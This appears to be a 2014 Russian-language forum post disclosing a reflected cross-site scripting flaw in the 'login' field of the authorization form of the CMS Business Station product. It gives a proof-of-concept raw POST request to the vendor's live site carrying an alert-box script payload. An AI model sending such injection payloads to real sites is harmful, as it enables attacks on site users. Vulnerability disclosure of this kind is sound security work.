23.07.2014, 11:59
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
CMS Business Station
Сайт: http://cms-bs.ru
Стоимость: http://cms-bs.ru/configuration/
reflected XSS
Уязвимость присутствует в форме авторизации - переменная login.
PoC: отправляем пакет
Сообщение от None
POST /configuration/ HTTP/1.1
Host: cms-bs.ru
...
login=
">alert(1)
&password=111&submit=%C2%F5%EE%E4
|
|
|